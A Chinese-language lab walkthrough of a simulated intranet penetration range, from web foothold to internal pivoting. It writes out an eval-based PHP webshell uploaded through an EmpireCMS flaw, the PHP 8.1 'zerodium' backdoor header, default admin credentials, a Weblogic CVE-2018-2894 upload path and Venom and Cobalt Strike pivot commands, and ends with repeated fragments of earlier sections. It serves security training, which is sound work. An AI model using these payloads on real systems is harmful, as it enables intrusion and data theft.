内网域渗透靶场实战教学文档<\/h1>

靶场概述<\/h2>
本靶场是一个模拟内网域环境的渗透测试场景，包含多台主机和多种常见漏洞。靶场拓扑结构包括外网打点和内网渗透两个主要阶段，涉及Web应用漏洞利用、数据库渗透、横向移动、权限提升等多个知识点。<\/p>

外网打点阶段<\/h2>

1. 初始信息收集<\/h3>

使用Nmap进行网段扫描：<\/p>

nmap -sN -PE 192.168.1.0\/24
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

192.168.1.9: 22端口(SSH)<\/li>
192.168.1.10: 8080端口(Web服务)<\/li>
192.168.1.11: 3306端口(MySQL)<\/li>
192.168.1.12: 主机名hack1(未扫描出端口)<\/li>
192.168.1.13: 主机名hack2(未扫描出端口)<\/li>
<\/ul>
2. PBOOTCMS漏洞利用<\/h3>

访问192.168.1.12的80端口，发现PBOOTCMS V2.0.8<\/li>
通过\/doc\/ChangeLog.txt<\/code>确认版本<\/li>
访问后台地址，使用弱口令admin\/admin123<\/code>登录<\/li>
尝试构造代码执行失败后，进行详细端口扫描发现88端口<\/li>
<\/ol>
3. 帝国CMS漏洞利用<\/h3>


访问192.168.1.12:88，发现帝国CMS<\/p>
<\/li>

后台地址\/e\/admin<\/code>，同样使用弱口令admin\/admin123<\/code><\/p>
<\/li>

利用EmpireCMS 7.5漏洞：<\/p>

数据库备份时未验证表名<\/li>
\/e\/class\/moddofun.php<\/code>的LoadInMod<\/code>函数存在漏洞<\/li>
<\/ul>
<\/li>

上传Webshell：<\/p>

创建1.php<\/code>内容：<\/li>
<\/ul>
<?<\/span>php<\/span> file_put_contents<\/span>("getshell.php"<\/span>, "<?php @eval(<\/span>\$<\/span>_POST[cmd]); ?>"<\/span>); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
重命名为1.php.mod<\/code>上传<\/li>
访问http:\/\/192.168.1.12:88\/e\/admin\/getshell.php<\/code>获取Webshell<\/li>
<\/ul>
<\/li>
<\/ol>
4. 信息收集与数据库渗透<\/h3>

在根目录找到第一个flag<\/li>
查看config.php<\/code>发现站库分离配置，数据库IP为192.168.1.13<\/li>
使用蚁剑的MYSQLI连接(注意使用3308端口)<\/li>
在数据库中找到第二个flag<\/li>
<\/ol>
5. PHP 8.1后门漏洞利用<\/h3>

访问192.168.1.10:8080，发现简单页面<\/li>
通过Wappalyzer或抓包识别PHP 8.1<\/li>
利用PHP 8.1后门漏洞：
User-Agentt: zerodiumsystem("ls");
<\/code><\/pre>
<\/li>
获取第三个flag<\/li>
<\/ol>
内网渗透阶段<\/h2>
1. 内网发现与代理设置<\/h3>

ipconfig<\/code>发现双网卡，内网段为10.10.10.0\/24<\/li>
使用CS生成木马上传执行<\/li>
使用Venom进行流量代理：

本地监听：admin.exe -lport 9999<\/code><\/li>
目标执行：agent.exe -rhost 192.168.1.2 -rport 9999<\/code><\/li>
配置浏览器代理访问内网<\/li>
<\/ul>
<\/li>
<\/ol>
2. Weblogic漏洞利用<\/h3>

扫描发现10.10.10.10:7001(Weblogic)<\/li>
识别版本为12.2.1.3<\/li>
利用CVE-2018-2894漏洞：

在数据库中找到后台账号密码<\/li>
登录后台打开web测试页<\/li>
访问http:\/\/10.10.10.10:7001\/ws_utc\/config.do<\/code><\/li>
修改工作目录为：
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war\css
<\/code><\/pre>
<\/li>
上传冰蝎马，通过F12获取时间戳构造访问路径<\/li>
连接冰蝎获取Webshell<\/li>
<\/ul>
<\/li>
<\/ol>
3. 横向移动与权限维持<\/h3>

在根目录找到第四个flag<\/li>
发现root.txt<\/code>文件，尝试SSH连接<\/li>
获取第五个flag<\/li>
使用TCP Beacon上线不出网主机：

创建TCP Beacon监听<\/li>
使用Stageless模式生成beacon.exe<\/li>
上传到可写目录(如\/tmp)<\/li>
执行beacon.exe<\/code>并使用connect 10.10.10.10<\/code>连接<\/li>
<\/ul>
<\/li>
<\/ol>
关键知识点总结<\/h2>

信息收集<\/strong>：Nmap扫描、版本识别、配置文件查看<\/li>
漏洞利用<\/strong>：

PBOOTCMS后台弱口令<\/li>
EmpireCMS 7.5文件上传漏洞<\/li>
PHP 8.1后门漏洞<\/li>
Weblogic CVE-2018-2894<\/li>
<\/ul>
<\/li>
数据库渗透<\/strong>：站库分离、非标准端口连接<\/li>
内网代理<\/strong>：Venom使用、CS代理<\/li>
横向移动<\/strong>：不出网主机上线(TCP Beacon)、Stager与Stageless区别<\/li>
权限维持<\/strong>：Webshell上传、后门植入<\/li>
<\/ol>
后续工作<\/h2>

权限提升(将在下半部分详细讲解)<\/li>
域渗透技术<\/li>
更复杂的内网横向移动技术<\/li>
<\/ol>
防御建议<\/h2>

避免使用弱口令<\/li>
及时更新补丁<\/li>
限制数据库远程访问<\/li>
监控异常文件上传<\/li>
网络隔离与访问控制<\/li>
日志审计与分析<\/li>
<\/ol>

内网域渗透靶场实战教学文档<\/h1>

靶场概述<\/h2> 本靶场是一个模拟内网域环境的渗透测试场景，包含多台主机和多种常见漏洞。靶场拓扑结构包括外网打点和内网渗透两个主要阶段，涉及Web应用漏洞利用、数据库渗透、横向移动、权限提升等多个知识点。<\/p>

外网打点阶段<\/h2>

内网渗透阶段<\/h2>

防御建议<\/h2> 避免使用弱口令<\/li> 及时更新补丁<\/li> 限制数据库远程访问<\/li> 监控异常文件上传<\/li> 网络隔离与访问控制<\/li> 日志审计与分析<\/li> <\/ol>

靶场概述<\/h2>
本靶场是一个模拟内网域环境的渗透测试场景，包含多台主机和多种常见漏洞。靶场拓扑结构包括外网打点和内网渗透两个主要阶段，涉及Web应用漏洞利用、数据库渗透、横向移动、权限提升等多个知识点。<\/p>

防御建议<\/h2>

避免使用弱口令<\/li>
及时更新补丁<\/li>
限制数据库远程访问<\/li>
监控异常文件上传<\/li>
网络隔离与访问控制<\/li>
日志审计与分析<\/li> <\/ol>